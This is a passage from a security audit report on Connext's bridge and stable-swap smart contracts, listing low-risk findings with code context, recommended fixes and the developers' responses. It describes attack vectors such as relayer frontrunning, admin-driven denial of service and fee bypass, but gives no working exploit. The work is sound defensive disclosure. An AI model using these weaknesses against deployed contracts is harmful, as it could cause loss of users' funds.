(provenAggregateRoots[_aggregateRoot]) { return; } ... // do several verifications provenAggregateRoots[_aggregateRoot] = true; ... } function proveMessageRoot(...) ... { if (provenMessageRoots[_messageRoot]) { return; } ... // do several verifications provenMessageRoots[_messageRoot] = true; } Recommendation: As an extra safety precaution do the following: • In function verifyAggregateRoot() check _aggregateRoot != 0. • In proveMessageRoot() check _messageRoot != 0. Connext: Solved in PR 2442. No check added in proveMessageRoot() because calculateMessageRoot() never results in 0. Spearbit: Verified. 5.3 Low Risk +5.3.1 _removeAssetId() should also clear custodied Severity: Low Risk Context: TokenFacet.sol#L483-L534 Description: In one of the fixes in PR 2530, _removeAssetId() doesn't clear custodied as it is assumed to be 0. function _removeAssetId(...) ... { // NOTE: custodied will always be 0 at this point } However custodied isn't always 0. Suppose cap & custodied have a value (!=0), then _setLiquidityCap() is called to set the cap to 0. The function doesn't reset the custodied value so it will stay at !=0. Recommendation: Clear custodied. Connext: The balance check of the _removeAssetId would cover this case. If the balance of the contract is 0 for the canonical asset, the entirety of the assets must be unbridged (meaning custodied would be 0). Additionally, when _setLiquidityCap is called with an enforceable (nonzero) value, it is always set to the balance of the contract. Spearbit: Acknowledged 30 +5.3.2 Remove liquidity while paused Severity: Low Risk Context: StableSwapFacet.sol#L312-L360, StableSwap.sol#L394-L446 Description: The function removeLiquidity() in StableSwapFacet.sol has a whenNotPaused modifier, while the comment shows Liquidity can always be removed, even when the pool is paused.. On the other hand function removeLiquidity() in StableSwap.sol doesn't have this modifier. StableSwapFacet.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant whenNotPaused ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... } StableSwap.sol#L394-L446 // Liquidity can always be removed, even when the pool is paused. function removeLiquidity(...) external ... nonReentrant ... { ... } function removeLiquidityOneToken(...) external ... nonReentrant whenNotPaused function removeLiquidityImbalance(...) external ... nonReentrant whenNotPaused ... { ... } ... { ... } Recommendation: Doublecheck if removal of liquidity is allowed while paused. Connext: Solved in PR 2354. Spearbit: Verified, all functions have whenNotPaused now. +5.3.3 Relayers can frontrun each other's calls to BridgeFacet.execute Severity: Low Risk Context: • BridgeFacet.sol#L337 • BridgeFacet.sol#L366 • BridgeFacet.sol#L565-L567 • BridgeFacet.sol#L381 Description: Relayers can front run each other's calls to BridgeFacet.execute. Currently, there is no on-chain mechanism to track how many fees should be allocated to each relayer. All the transfer bump fees are funneled into one address s.relayerFeeVault. Recommendation: If for example, off-chain agents keep track of the following event emitted by execute and use that to calculate the distribution of funds per relayer that can motivate the relayers to front run each other. emit Executed(transferId, _args.params.to, asset, _args, local, amount, msg.sender); Note: Only the delegate and allowed/approved relayers can call execute. Connext: At the moment, fee disbursements for relayers are handled in a trusted manner. We're working with Gelato to figure out a better long term solution here. More generally, if we have adversarial relayer networks (i.e. relayers are not beholden to a shared set of offchain incentives to penalize frontrunning), this issue will always exist. This is why we've chosen to only work with one decentralized relayer network for now. Spearbit: Acknowledged. 31 +5.3.4 OptimismHubConnector.processMessageFromRoot emits MessageProcessed for already processed messages Severity: Low Risk Context: • OptimismHubConnector.sol#L119-L120 • OptimismHubConnector.sol#L76-L81 Description: Calls to processMessageFromRoot with an already processed _data still emit MessageProcessed. This might cause issues for off-chain agents like relayers monitoring this event. Recommendation: We recommend moving MessageProcessed inside _processMessage's if block: function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, "!length"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); emit MessageProcessed(_data, msg.sender); // <--- added line } // otherwise root was already sent to root manager } Note, if we inline _processMessage inside processMessageFromRoot we can avoid encoding and then decoding the root. Connext: Solved in PR 2447. Spearbit: Verified. +5.3.5 Add max cap for domains Severity: Low Risk Context: DomainIndexer.sol#L99 Description: Currently there isn't any cap on the maximum amount of domains which system can support. If the size of the domains and connectors grow, at some point due to out-of-gas errors in updateHashes function, both addDomain and removeDomain could DOS. Recommendation: Place a cap for MAX_DOMAINS. function addDomain(uint32 _domain, address _connector) internal { ... // MAX_DOMAINS could be defined globally as `uint256 public constant MAX_DOMAINS = {value};` require(domains.length < MAX_DOMAINS, "DomainIndexer at capacity"); ... } Connext: Fixed in PR 2209. Spearbit: Verified. 32 +5.3.6 In certain scenarios calls to xcall... or addRouterLiquidity... can be DoSed Severity: Low Risk Context: • TokenFacet.sol#L219-L222 • BridgeFacet.sol#L489-L497 • RoutersFacet.sol#L554-L561 Description: The owner or an admin can frontrun (or it can be by an accident) a call that: • A router has made on a canonical domain of a canonical token to supply that token as liquidity OR • A user has made to xcall... supplying a canonical token on its canonical domain. The frontrunning call would set the cap to a low number (calling updateLiquidityCap). This would cause the calls mentioned in the bullet list to fail due to the checks against IERC20(_local).balanceOf(address(this)). Recommendation: This is a low-risk issue due to the severity and the amount of privilege required to execute. But a delayed update mechanism can be applied for updateLiquidityCap or perhaps a governance body can vote for setting new caps. Connext: This seems to me to be a pure griefing vector and in my opinion, can be ignored if that is the case. Spearbit: Acknowledged. +5.3.7 Missing a check against address(0) in ConnextPriceOracle's constructor Severity: Low Risk Context: ConnextPriceOracle.sol#L78-L81 Description: When ConnextPriceOracle is deployed an address _wrapped is passed to its constructor. The current codebase does not check whether the passed _wrapped can be an address(0) or not. Recommendation: Add a check to make sure the _wrapped value provided cannot be address(0). Connext: Solved in PR 2371. Spearbit: Verified. +5.3.8 _executeCalldata() can revert if insufficient gas is supplied Severity: Low Risk Context: BridgeFacet.sol#L785-L840 Description: The function _executeCalldata() contains the statement gasleft() - 10_000. This statement can revert if the available gas is less than 10_000. Perhaps this is the expected behaviour. Note: From the Tangerine Whistle fork only a maximum 63/64 of the available gas is sent to contract being called. Therefore, 1/64th is left for the calling contract. function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(_params.to, gasleft() - 10_000, ... ); ... ,! } Recommendation: Double check the gas requirements. Consider giving a more clear error message if insuffient gas is supplied. Connext: Solved in PR 2519. 33 Spearbit: Verified. +5.3.9 Be aware of precompiles Severity: Low Risk Context: BridgeFacet.sol#L785-L840 Description: The external calls by _executeCalldata() could call a precompile. Different chains have creative precompile implementations, so this could in theory pose problems. For example precompile 4 copies memory: what-s-the-identity-0x4-precompile Note: precompiles link to dedicated pieces of code written in Rust or Go that can be called from the EVM. Here are a few links for documentation on different chains: moonbeam precompiles, astar precompiles function _executeCalldata(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _params.to, ...); } else { returnData = IXReceiver(_params.to).xReceive(...); } ... } Recommendation: When deploying to new chains, verify that available precompiles can't be abused. Connext: Added a comment in PR 2446 to reflect this, but this is a risk. Spearbit: Acknowledged. +5.3.10 Upgrade to solidity 0.8.17 Severity: Low Risk Context: nxtp contracts Description: Solidity 0.8.17 released a bugfix where the optimizer could incorrectly remove storage writes if the code fit a certain pattern (see this security alert). This bug was introduced in 0.8.13. Since Connext is using the legacy code generation pipeline, i.e., compiling without the via-IR flag, the current code is not at risk. This is because assembly blocks dont write to storage. However, if this changes and Connext compiles through via-IR code generation, the code is more likely to be affected. One reason to use this code generation pipeline could be to enable gas optimizations not available in legacy code generation. Recommendation: Consider upgrading to solidity 0.8.17. Connext: Fixed in PR 2436. Spearbit: Verified. 34 +5.3.11 Add domain check in setupAssetWithDeployedRepresentation() Severity: Low Risk Context: TokenFacet.sol#L192-L204 Description: The function setupAssetWithDeployedRepresentation() links a new _representation asset. However this should not be done on the canonical domain. So good to check this to prevent potential mistakes. function setupAssetWithDeployedRepresentation(...) ... { bytes32 key = _enrollAdoptedAndLocalAssets(_adoptedAssetId, _representation, _stableSwapPool, _canonical); ... ,! } Recommendation: Add a check for (_canonical.domain != s.domain). Connext: Solved in PR 2298. Spearbit: Verified. +5.3.12 If an adopted token and its canonical live on the same domain the cap for the custodied amount is applied for each of those tokens Severity: Low Risk Context: RoutersFacet.sol#L554-L561 Description: If _local is an adopted asset that lives on its canonical's original chain, then we are comparing the to-be-updated balance of this contract (custodied) with s.caps[key]. That means we are also comparing the balance of an adopted asset with the property above with the cap. For example, if A is the canonical token and B the adopted, then cap = s.caps[key] is used to cap the custodied amount in this contract for both of those tokens. So if the cap is 1000, the contract can have a balance of 1000 A and 1000 B, which is twice the amount meant to be capped. This is true basically for any approved asset with the above properties. When the owner or the admin calls setu- pAsset: // File: https://github.com/connext/nxtp/blob/32a0370edc917cc45c231565591740ff274b5c05/packages/deploym ents/contracts/contracts/core/connext/facets/TokenFacet.sol#L164-L172 ,! function setupAsset( c TokenId calldata _canonical, uint8 _canonicalDecimals, string memory _representationName, string memory _representationSymbol, address _adoptedAssetId, address _stableSwapPool, uint256 _cap ) external onlyOwnerOrAdmin returns (address _local) { such that _canonical.domain == s.domain and _adoptedAssetId != 0, then this asset has the property in ques- tion. Recommendation: Extra attention must be paid to tokens with such properties and perhaps set the cap equal to half the amount one would have set otherwise. Connext: Local on the canonical domain should always be the adopted assets, this assertion is represented in PR 2455. Spearbit: Verified. 35 +5.3.13 There are no checks/constraints against the _representation provided to setupAssetWithDe- ployedRepresentation Severity: Low Risk Context: TokenFacet.sol#L192-L198 Description: setupAssetWithDeployedRepresentation is similar to setupAsset in terms of functionality, except it does not deploy a representation token if necessary. It actually uses the _representation address given as the representation token. The _representation parameter given does not have any checks in terms of functionality compared to when setupAsset which deploys a new BridgeToken instance: // File: packages\deployments\contracts\contracts\core\connext\facets\TokenFacet.sol#L399 _token = address(new BridgeToken(_decimals, _name, _symbol)); Basically, representation needs to implement IBridgeToken (mint, burn, setDetails, ... ) and some sort of IERC20. Otherwise, if a function from IBridgeToken is not implemented or if it does not have IERC20 functionality, it can cause failure/reverts in some functions in this codebase. Another thing that is important is that the decimals for _representation should be equal to the decimals precision of the canonical token. And that _representation should not be able to update/change its decimals. Also, this opens an opportunity for a bad owner or admin to provide a malicious _representation to this function. This does not have to be a malicious act, it can also happen by mistake from for example an admin. Additionally the Connext Diamond must have the "right" to mint() and burn() the tokens. Recommendation: We can require a call to a specific endpoint of _representation to return a magic value that would indicate that it supports some specific interfaces. This would only be a measure against possible benign mistakes that could happen by the admins or the owner when calling setupAssetWithDeployedRepresentation() with a wrong value for _representation. Also verify tokens can be mint()ed and burn()t. Connext: In the following PR, NatSpec comments have been added for devs to warn them about this issue: PR 2472. Also in _enrollAdoptedAndLocalAssets, minting and burning of a IBridgeToken asset has been tested when not on a canonical domain. Spearbit: Verified. +5.3.14 In dequeueVerified when no verified items are found in the queue last == first - 1 Severity: Low Risk Context: Queue.sol#L80 Description: The comment in dequeueVerified mentions that when no verified items are found in the queue, then last == first. But this is not true since the loop condition is last >= first and the loop only terminates (not considering the break) when last == first - 1. It is important to correct this incorrect statement in the comment, since a dev/user can by mistake take this state- ment as true and modify/use the code with this incorrect assumption in mind. Recommendation: Update the comment so that: - first == last + last == first - 1 Connext: Solved in PR 2228. Spearbit: Verified. 36 +5.3.15 Dirty bytes in _loc and _len can override other values when packing a typed memory view in unsafeBuildUnchecked Severity: Low Risk Context: • TypedMemView.sol#L323-L324 • TypedMemView.sol#L329-L330 Description: For a TypeedMemView, the location and the length are supposed to occupy 12 bytes (uint96), but the type used for these values for the input parameters for unsafeBuildUnchecked is uint256. This would allow those values to carry dirty bytes and when the following calculations are performed: newView := shl(96, or(newView, _type)) // insert type newView := shl(96, or(newView, _loc)) // insert loc newView := shl(24, or(newView, _len)) // empty bottom 3 bytes _loc can potentially manipulate the type section of the view and _len can potentially manipulate both the _loc and the _type section. Recommendation: Either restrict the input parameter types or perform cleanup via masking in assembly to make sure those values would not be able to override other values in the packed view. Connext: Solved in PR 2475. Spearbit: Verified. +5.3.16 To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they return the corresponding hash values. Severity: Low Risk Context: • TypedMemView.sol#L646 • TypedMemView.sol#L668-L669 • TypedMemView.sol#L685-L686 Description: sha2, hash160 and hash256 assume that the precompile contracts at address(2) and address(3) calculate and return the sha256 and ripemd160 hashes of the provided memory chunks. These assumptions depend on the chain that the project is going to be deployed on. Recommendation: To use sha2, hash160 and hash256 of TypedMemView the hard-coded precompile addresses would need to be checked to make sure they are available on the specific chain and that they return the corre- sponding hash values. For example zkSync recently added the precompile contracts for sha245 and keccak256 and the compiler zksolc inlines the precompiled addresses for those endpoints (0x0002, 0x8010). Connext: Functions removed in PR 2472. Spearbit: Verified. 37 +5.3.17 sha2, hash160 and hash256 of TypedMemView.sha2 do not clear the memory after calculating the hash Severity: Low Risk Context: • TypedMemView.sol#L646 • TypedMemView.sol#L662 • TypedMemView.sol#L679 Description: When a call to the precompile contract at address(2) (or at address(3)) is made, the returned value is placed at the slot pointed by the free memory pointer and then placed on the stack. The free memory pointer is not incremented to account for this used memory position nor the code tries to clean this memory slot of 32 bytes. Therefore after a call to sha2, hash160 or hash256, we would end up with dirty bytes. Recommendation: Either increment the free memory pointer by 0x20 to account for the dirty bytes or clean the dirty bytes. Cleaning would be cheaper since memory might not get expanded for the next memory operation in the codebase. As a side note, it might be also best to call sha2 function sha256. Connext: Removed in PR 2474. Spearbit: Verified. +5.3.18 Fee on transfer token support Severity: Low Risk Context: SwapUtils.sol#L902-L905 Description: It seems that only the addLiquidity function is currently supporting the fee on transfer token. All operations like swapping are prohibiting the fee on transfer token. Note: The SwapUtilsExternal.sol contract allow fee on transfer token and as per product team, this is expected from this token Recommendation: If fee on transfer token are not expected while adding liquidity then revert if token used is placing any fee on transfer require(amounts[i] == token.balanceOf(address(this)) - beforeBalance, "Fee on transfer token not ,! supported"); Connext: Solved in PR 2217. SwapUtils is for internal StableSwap (implemented in StableSwapFacet). That doesn't support fee tokens. Swa- pUtilsExternal is for external StableSwap contract (StableSwap.sol) and it can support fee tokens as well. because all swap and add/remove liquidity will be executed via transferFrom function, and we can get real amount that we received. Spearbit: Why not use AssetLogic.handleIncomingAsset() which already has this check? Reduces code dupli- cation. The fix should also be applied for all instances of safeTransferFrom: core-libraries/SwapUtils.sol:712: core-libraries/SwapUtils.sol:776: core-libraries/SwapUtils.sol:902: core-libraries/SwapUtilsExternal.sol:749: dx); ,! core-libraries/SwapUtilsExternal.sol:813: dx); ,! core-libraries/SwapUtilsExternal.sol:868: ,! amounts[i]); tokenFrom.safeTransferFrom(msg.sender, address(this), dx); tokenFrom.safeTransferFrom(msg.sender, address(this), dx); token.safeTransferFrom(msg.sender, address(this), amounts[i]); tokenFrom.safeTransferFrom(msg.sender, address(this), tokenFrom.safeTransferFrom(msg.sender, address(this), token.safeTransferFrom(msg.sender, address(this), 38 can also use handleOutgoingAsset() for all outgoing transfers core-libraries/SwapUtils.sol:732: core-libraries/SwapUtils.sol:782: core-libraries/SwapUtils.sol:988: core-libraries/SwapUtils.sol:1034: core-libraries/SwapUtils.sol:1116: core-libraries/SwapUtils.sol:1140: core-libraries/SwapUtilsExternal.sol:769: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); self.pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); self.pooledTokens[i].safeTransfer(msg.sender, amounts[i]); token.safeTransfer(to, balance); self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, dy); ,! core-libraries/SwapUtilsExternal.sol:819: dy); ,! core-libraries/SwapUtilsExternal.sol:954: amounts[i]); ,! core-libraries/SwapUtilsExternal.sol:1000: dy); ,! core-libraries/SwapUtilsExternal.sol:1082: amounts[i]); ,! core-libraries/SwapUtilsExternal.sol:1106: self.pooledTokens[tokenIndexTo].safeTransfer(msg.sender, self.pooledTokens[i].safeTransfer(msg.sender, self.pooledTokens[tokenIndex].safeTransfer(msg.sender, self.pooledTokens[i].safeTransfer(msg.sender, token.safeTransfer(to, balance); +5.3.19 Fee on transfer tokens can stuck the transaction Severity: Low Risk Context: AssetLogic.sol#L79 Description: Consider the following scenario. 1. Assume User has made a xcall with amount A of token X with calldata C1. Since their was no fee while transferring funds, transfer was a success. 2. Now, before this amount can be transferred on the destination domain,token X introduced a fee on transfer. 3. Relayer now executes this transaction on destination domain via _handleExecuteTransaction function on BridgeFacet.sol#L756. 4. This transfers the amount A of token X to destination domain but since now the fee on this token has been introduced, destination domain receives amount A-delta. 5. This calldata is called on destination domain but the amount passed is A instead of A-delta so if the IXRe- ceiver has amount check then it will fail because it will now expect A amount when it really got A-delta amount. Recommendation: Documentation should be updated in order to guide users about such scenarios so that they can design the IXReceiver contracts accordingly (handling calldata failures gracefully) Connext: The only way a token can get used in the protocol is if it goes through the approval process. Vetting of tokens for use cross-chain will be done responsibly to ensure we aren't using fee-on-transfer tokens, since they aren't compatible with the protocol anyway: AssetLogic.sol#L55 If a token is upgradeable, and it upgrades its contracts to add the fee-on-transfer functionality, such an upgrade would break the flow at the step in the line above. For now, if the token is upgradeable, it will need to be carefully monitored by admins to handle unapproving the asset if it becomes a fee-on-transfer token. Spearbit: Acknowedged. 39 +5.3.20 Initial Liquidity Provider can trick the system Severity: Low Risk Context: SwapUtils.sol#L923-L924 Description: Since there is no cap on the amount which initial depositor can deposit, an attacker can trick the system in bypassing admin fees for other users by selling liquidity at half admin fees. Consider the following scenario. 1. User A provides the first liquidity of a huge amount. 2. Since there aren't any fees from initial liquidity, admin fees are not collected from User A. 3. Now User A can sell his liquidity to other users with half admin fees. 4. Other users can mint larger liquidity due to lesser fees and User A also get benefit of adminFees/2. Recommendation: Add a cap until which admin fees are revoked for initial depositor. Once cap is breached, user will need to pay the admin fees. Connext: The initial depositor will be owner or verified account. Protection from a malicious admin, is not worth implementing. At this point there are a myriad of ways malicious admins could take advantage of users, and this adds some extra complexity to address an edgecase that is relatively unlikely. Spearbit: Acknowledged. +5.3.21 Ensure non-zero local asset in _xcall() Severity: Low Risk Context: BridgeFacet.sol#L481 Description: Local asset fetched in _xcall() is not verified to be a non-zero address. In case, if token mappings are not updated correctly and to future-proof from later changes, it's better to revert if a zero address local asset is fetched. local = _getLocalAsset(key, canonical.id, canonical.domain); Recommendation: Consider reverting if local == address(0). Connext: Solved in PR 2471. Spearbit: Verified. +5.3.22 Use ExcessivelySafeCall to call xReceive() Severity: Low Risk Context: BridgeFacet.sol#L828 reconciled transfers, ExcessivelySafeCall.excessivelySafeCall() is used to call Description: xReceive(). This is done to avoid copying large amount of return data in memory. This same attack vector exists for non-reconciled transfers, however in this case a usual function call is made for xReceive(). For However, in case non-reconciled calls fail due to this error, they can always be retried after reconciliation. Recommendation: Consider replacing the direct function call xReceive() with excessivelySafeCall(). Store the success of the call in success and revert if it is false. Connext: Solved in PR 2470. Spearbit: Verified. 40 +5.3.23 A router's liquidity might get trapped if the router is removed Severity: Low Risk Context: • RoutersFacet.sol#L297 • RoutersFacet.sol#L518 • RoutersFacet.sol#L498 • RoutersFacet.sol#L581 Description: If the owner or a user with Role.Router Role removes a router that does not implement calling re- moveRouterLiquidity or removeRouterLiquidityFor, then any liquidity remaining in the contract for the removed router cannot be transferred back to the router. Recommendation: To be able to remove the router's liquidity, the owner or a user with Role.Router Role needs to add the router back by calling setupRouter and make sure the owner parameter provided to setupRouter is not address(0). Then the router's owner would need to call removeRouterLiquidity for this router. Then the owner or a user with Role.Router Role of this connext instance can remove the router again. A workaround would be when removing a router, it would instead be marked as removed and not clear the router's owner. So even after marking it as removed the router's owner can call removeRouterLiquidityFor. Connext: Solved in PR 2413. Spearbit: Verified. +5.3.24 In-flight transfers by the relayer can be reverted when setMaxRoutersPerTransfer is called before- hand by a lower number Severity: Low Risk Context: • RoutersFacet.sol#L338 • BridgeFacet.sol#L586 Description: For in-flight transfers where an approved sequencer has picked and signed an x number of routers for a transfer, from the time a relayer or another 3rd party grabs this ExecuteArgs _args to the time this party submits it to the destination domain by calling execute on a connext instance, the owner or an admin can call setMaxRoutersPerTransfer with a number lower than x on purpose or not. And this would cause the call to execute to revert with BridgeFacet__execute_maxRoutersExceeded. Recommendation: If this act is malicious, for example, a malicious admin doing this for a while to DoS the execute endpoint for fast liquidity routes, the owner would need to detect and remove the said admin. A solution to prevent this type of DoS or accidental acts could be by adding delays between consecutive calls to setMaxRoutersPerTransfer for only admins. Maybe the owner should be able to bypass this delay, since if we can't trust the owner there are more serious things that we should be worried about. The delay range between when a sequencer has the _args ready and the time a relayer calling execute should be measured and documented for the involved parties. Connext: Likely the max routers per transfer will be controlled by a DAO entity in the future, meaning the config- uration changes will be subject to a wait period and can be anticipated. A failed execute would revert fairly early and likely could grief very little ETH from the relayer. The sequencer can just re-auction the transfer after the failed execute in short order. Spearbit: Acknowledged. 41 +5.3.25 All the privileged users that can call withdrawSwapAdminFees would need to trust each other Severity: Low Risk Context: SwapAdminFacet.sol#L183 Description: The owner needs to trust all the admins and also all admins need to trust each other. Since any admin can call withdrawSwapAdminFees endpoint to withdraw all the pool's admin fees into their account. Recommendation: There is no accounting per different admins and all admin funds are pooled into the same place. We need to make sure they are all aware of this. Also document how the admins are picked and how the trust is established between them and the owner. To avoid this issue, Connext could also implement a governance voting structure where admins would vote on how the funds are distributed. Connext: Safe to assume that all admins are trusted as much as owner in their privileges on-chain for the time being (this will change under DAO management, of course). Minus upgrading, but withdrawing these fees is one of several ways the owner trusts admins to not be malicious. Others include updating fees, setting the relayer vault to a different address, removing assets, etc. Spearbit: Acknowledged. +5.3.26 The supplied _a to initializeSwap cannot be directly updated but only ramped Severity: Low Risk Context: • SwapAdminFacet.sol#L109-L119 • SwapAdminFacet.sol#L216 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter) the supplied _a (the scaled amplification coefficient, Ann(cid:0)1 ) to initializeSwap cannot be directly updated but only ramped. The owner or the admin can still call rampA to update _a, but it will take some time for it to reach the desired value. This is mostly important if by mistake an incorrect value for _a is provided to initializeSwap. Recommendation: We need to make sure this is documented and the users/devs/routers are all aware of this issue. Connext: Documented in PR 2469. Spearbit: Verified. +5.3.27 Inconsistent behavior when xcall with a non-existent _params.to Severity: Low Risk Context: BridgeFacet.sol#L802 Description: A xcall with a non-existent _params.to behaves differently depending on the path taken. 1. Fast Liquidity Path - Use IXReceiver(_params.to).xReceive. The _executeCalldata function will revert if _params.to is non-existent. Which technically means that the execution has failed. 2. Slow Path - Use ExcessivelySafeCall.excessivelySafeCall. This function uses the low-level call, which will not revert and will return true if the _params.to is non-existent. The _executeCalldata function will return with success set to True, which means the execution has succeeded. Recommendation: For consistency, if the _params.to points to a non-existent contract in the Slow Path, skip the ExcessivelySafeCall.excessivelySafeCall call, return, and set success as False. Connext: It the call params.to is empty (meaning address(0)), then the xcall will revert: BridgeFacet.sol#L454 42 If the execute receives an empty to, then we can assume the execution is invalid. An invalid execution (via fast path) can only result in a loss of funds for those involved, since there is no hope of reimbursement. An invalid execution for slow path can only mean that fraud was committed (there was no corresponding xcall on sending chain) - concerns around that kind of invalid execution should be directed to the security model for the messaging layer. Spearbit: Acknowledged. +5.3.28 The lpToken cloned in initializeSwap cannot be updated Severity: Low Risk Context: • SwapAdminFacet.sol#L109-L119 • SwapAdminFacet.sol#L157 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter) an LPToken lpToken is created by cloning the provided lpTokenTargetAddress to the initializeSwap endpoint. There is no restriction on lpTokenTargetAddress except that it would need to be of LPToken like, but it can be malicious under the hood or have some security vulnerabilities, so it can not be trusted. Recommendation: The procedure of picking and submitting the lpTokenTargetAddress to the initializeSwap would need to be thorough and documented. Also, one can avoid cloning lpTokenTargetAddress and instead create LPToken from a known implementation in the codebase that has been audited. Connext: Some checks have been added. It does still allow admins to supply malicious values, but it would be much more easily detectable (as it wouldn't have to be checked against previously used values, you could simply search for the update event). Solved in PR 2389. Spearbit: Verified. +5.3.29 Lack of zero check Severity: Low Risk Context: BridgeFacet.sol#L216, BridgeFacet.sol#L247, TokenFacet.sol#L272 Description: Consider the following scenarions. • Instance 1 - BridgeFacet.addSequencer The addSequencer function of BridgeFacet.sol does not check that the sequencer address is not zero before adding them. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } If there is a mistake during initialization or upgrade, and set s.approvedSequencers[0] = true, anyone might be able to craft a payload to execute on the bridge because the attacker can bypass the following validation within the execute function. if (!s.approvedSequencers[_args.sequencer]) { revert BridgeFacet__execute_notSupportedSequencer(); } • Instance 2 - BridgeFacet.enrollRemoteRouter 43 The enrollRemoteRouter function of BridgeFacet.sol does not check that the domain or router address is not zero before adding them. function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } • Instance 3 - TokenFacet._enrollAdoptedAndLocalAssets The _enrollAdoptedAndLocalAssets function of TokenFacet.sol does not check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; These two values are used for generating the key to determine if a particular asset has been approved. Additionally, zero value is treated as a null check within the AssetLogic.getCanonicalTokenId function: // Check to see if candidate is an adopted asset. _canonical = s.adoptedToCanonical[_candidate]; if (_canonical.domain != 0) { // Candidate is an adopted asset, return canonical info. return _canonical; } Recommendation: Check that sequencer address is not zero before adding it. function addSequencer(address _sequencer) external onlyOwnerOrAdmin { + require(_sequencer != address(0), "sequencer with zero address"); if (s.approvedSequencers[_sequencer]) revert BridgeFacet__addSequencer_alreadyApproved(); s.approvedSequencers[_sequencer] = true; emit SequencerAdded(_sequencer, msg.sender); } Check that the domain or router address is not zero before adding it. 44 function enrollRemoteRouter(uint32 _domain, bytes32 _router) external onlyOwnerOrAdmin { + + require(_domain != 0, "zero domain"); require(_router != 0, "router with zero address"); // Make sure we aren't setting the current domain as the connextion. if (_domain == s.domain) { revert BridgeFacet__addRemote_invalidDomain(); } s.remotes[_domain] = _router; emit RemoteAdded(_domain, TypeCasts.bytes32ToAddress(_router), msg.sender); } Check that the _canonical.domain and _canonical.id are not zero before adding them. function _enrollAdoptedAndLocalAssets( address _adopted, address _local, address _stableSwapPool, TokenId calldata _canonical ) internal returns (bytes32 _key) { + + require (_canonical.domain != 0, "_canonical.domain is zero"); require (_canonical.id != 0, "_canonical.id is zero"); // Get the key _key = AssetLogic.calculateCanonicalHash(_canonical.id, _canonical.domain); // Get true adopted address adopted = _adopted == address(0) ? _local : _adopted; // Sanity check: needs approval if (s.approvedAssets[_key]) revert TokenFacet__addAssetId_alreadyAdded(); // Update approved assets mapping s.approvedAssets[_key] = true; // Update the adopted mapping using convention of local == adopted iff (_adooted == address(0)) s.adoptedToCanonical[adopted].domain = _canonical.domain; s.adoptedToCanonical[adopted].id = _canonical.id; Connext: Solved in PR 2297. Spearbit: Verified. +5.3.30 When initializing Connext bridge make sure _xAppConnectionManager domain matches the one pro- vided to the initialization function for the bridgee Severity: Low Risk Context: • DiamondInit.sol#L59 • DiamondInit.sol#L62 • SpokeConnector.sol#L250-L252 • SpokeConnector.sol#L282-L296 • BridgeFacet.sol#L238-L240 Description: The only contract that implements IConnectorManager fully is SpokeConnector (through inheriting ConnectorManager and overriding localDomain): 45 // File: SpokeConnector.sol function localDomain() external view override returns (uint32) { return DOMAIN; } So a SpokeConnector or a IConnectorManager has its own concept of the local domain (the domain that it lives / is deployed on). And this domain is used when we are hashing messages and inserting them into the SpokeCon- nector's merkle tree: // File: SpokeConnector.sol bytes memory _message = Message.formatMessage( DOMAIN, bytes32(uint256(uint160(msg.sender))), _nonce, _destinationDomain, _recipientAddress, _messageBody ); // Insert the hashed message into the Merkle tree. bytes32 _messageHash = keccak256(_message); // Returns the root calculated after insertion of message, needed for events for // watchers (bytes32 _root, uint256 _count) = MERKLE.insert(_messageHash); We need to make sure that this local domain matches the _domain provided to this init function. Otherwise, the message hashes that are inserted into SpokeConnector's merkle tree would have 2 different origin domains linked to them. One from SpokeConnector in this message hash and one from connext's s.domain = _domain which is used in calculating the transfer id hash. The same issue applies to setXAppConnectionManager. Recommendation: We suggest comparing these 2 domains to avoid potential pitfalls for cross-chain transfers. // File: DiamondInit.sol error DiamondInit__init_domainsDontMatch(); ... // Connext s.LIQUIDITY_FEE_NUMERATOR = 9995; s.maxRoutersPerTransfer = 5; if( _domain != IConnectorManager(_xAppConnectionManager).localDomain()) { revert DiamondInit__init_domainsDontMatch(); } s.domain = _domain; s.xAppConnectionManager = IConnectorManager(_xAppConnectionManager); The same check can be applied to setXAppConnectionManager: // File: BridgeFacet.sol function setXAppConnectionManager(address _xAppConnectionManager) external onlyOwnerOrAdmin { if( s.domain != IConnectorManager(_xAppConnectionManager).localDomain()) { revert DiamondInit__init_domainsDontMatch(); } s.xAppConnectionManager = IConnectorManager(_xAppConnectionManager); } Connext: Solved in PR 2465. 46 Spearbit: Verified. +5.3.31 The stable 